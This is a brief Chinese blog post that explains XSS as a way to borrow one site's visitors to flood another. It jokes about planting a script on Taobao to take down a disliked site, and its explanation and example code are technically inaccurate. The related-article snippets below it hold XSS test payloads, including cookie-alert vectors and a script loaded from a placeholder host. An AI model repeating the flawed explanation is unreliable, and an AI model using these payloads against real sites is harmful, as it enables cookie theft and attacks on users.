1句话讲明白XSS

最新推荐文章于 2024-04-24 23:55:02 发布
最新推荐文章于 2024-04-24 23:55:02 发布
阅读量193 收藏
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/capfjian/article/details/108491220
版权

 

看到一个不顺眼的http://xxx/ ,想盘它。

很简单啊,来个1亿并发访问这个网站就搞凉凉了,说的简单,这1亿并发哪来啊。

借力啊,在双11的时候,在淘宝官方活动网页上挂一行代码
<script> http://xxx/</script>

假如双11来了,淘宝用户在参加活动时肯定会访问这个网址是吧,想想这个流量都可怕,虽然淘宝不会挂,但是http://xxx/肯定凉透啊。

至于怎么挂上那一行代码,去找小马哥啊,他肯定有办法。

好了,言归正传,现在几乎都是动态网站,我在A网站的评论区输入评论时输入<script> http://xxx/</script>

那么所有看到这条评论的人都会去访问http://xxx/,当看评论的人太多时,实际上就是对 http://xxx/的攻击了。

一句话,就是借助A网站的流量攻击B网站。

当然A网站是不是故意留下这么个漏洞就不好说了。

 

capfjian
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS测试语大全
08-07
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
DedeCMS 存储型xss漏洞1
08-03
【DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
XSS
2301_76786857的博客
01-20 1133
跨站脚本攻击(XSS)是一种常见的网络攻击手段,攻击者通过在目标网站中注入恶意脚本,获取用户敏感信息,如用户名、密码等,从而达到盗取用户数据的目的。
XSS大全
最新发布
ch_ycc的博客
04-24 1269
10、t_sort="type="button" onfocus="alert(1) onfocus-当窗口获得焦点时运行脚本。13、Cookies传 user=" onclick="alert(1)" type="text"12、User agent传 "type="button" onclick="alert(1)11、Referer传" type="button" onclick="alert(1)转化为实体字符: javascript:alert('xss')
xss+csrf生成一句话
weixin_34148508的博客
07-04 1019
1、找到存在xss的地方提交代码:例如:<script src=http://xxx.com/js.js></script>;2、构造该js.var request = false;if(window.XMLHttpRequest) {request = new XMLHttpRequest();if(request.overrideMimeType)...
XSS大全
weixin_46601374的博客
03-01 8218
XSS的原理和特性 xss:将用户的输入当作前端代码执行 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 html:定义了网页的结构 css:美化页面 js:可以操浏览器 XSS主要拼接的是什么 SQL注入拼接的是操作数据库的SQL语XSS拼接的是网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语(总结:xss就是拼接恶意的HTML) xss
edu 后台xss1
08-08
标题“edu 后台xss1”涉及到的是一个教育平台后台系统的XSS(跨站脚本)漏洞。XSS漏洞是网络安全中常见的一个问题,它允许攻击者在目标网站的页面上注入恶意脚本,进而影响到网站的正常用户。在这个案例中,攻击者...
gnuboard xss漏洞1
08-03
XSS漏洞详解】 XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者在受害者的浏览器上执行恶意脚本。XSS攻击通常发生在Web应用程序未能充分验证或转义用户输入的数据时,使得这些数据可以被当作...
XSS攻击实例1
01-11
在本实例"XSS攻击实例1"中,我们将探讨这种攻击的原理、类型以及如何在Asp.net框架下预防。 XSS攻击主要分为三类:反射型XSS、存储型XSS和DOM型XSS。反射型XSS是通过诱使用户点击含有恶意参数的链接,将脚本插入到...
Flash XSS漏洞挖掘1
08-03
【Flash XSS漏洞挖掘1】 Flash XSS(跨站脚本)漏洞是网络安全领域中一个重要的问题,尤其是在企业级的Bug Bounty活动中。尽管这个概念并不新鲜,早在2002年就已经有相关的技术出现,但近期在Apple、Amazon、Adobe...
xss攻击语大全。。
04-16
网站安全测试。。xss漏洞。。免去你输入的麻烦。可以直接复制粘贴。。
XSS
a674212706的博客
03-18 116
0×04 过滤的解决办法 假如说网站禁止过滤了script 这时该怎么办呢,记住一句话, 这是我总结出来的“xss就是在页面执行你想要的js”不用管那么多, 只要能运行我们的js就OK,比如用img标签或者a标签。我们可以这样写 <imgscr=1onerror=alert('xss')> ...
xss大全
kaosini的专栏
06-12 1554
转载地址:http://blog.sina.com.cn/s/blog_3f595e9e010007pf.html alert(document.cookie) ='>cript>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E
xss测试语
Fighter1028
01-09 9046
<script>alert(navigator.userAgent)<script> <script>alert(1)</script> <script>confirm(1)</script> <script>prompt(1)</script> <script>\u0061\u006C\u...
xss 常用语
柳岸花又明的博客
03-28 508
iframe srcdoc=""> --弹ip。 //引用外部的xss。 //弹cookie。 --反射型。
XSS攻击
weixin_48300170的博客
07-25 250
XSS什么是XSSxss攻击的危害xss漏洞的类型xss漏洞攻击主要方式分析xss攻击的防御 什么是XSS       XSS 即(Cross Site Scripting)中文名称为:跨站脚本攻击。人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSSxss攻击的危害 盗取各类用户帐号,如机器登
BUU XSS COURSE 1
09-12
BUU XSS COURSE 1是一个关于跨站脚本攻击(XSS)的课程。在这个课程中,学习者将学习如何识别和利用网站中的XSS漏洞。引用中提到了一个payload,它包含了一个iframe标签和一段srcdoc代码,这个payload可以用于触发XSS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值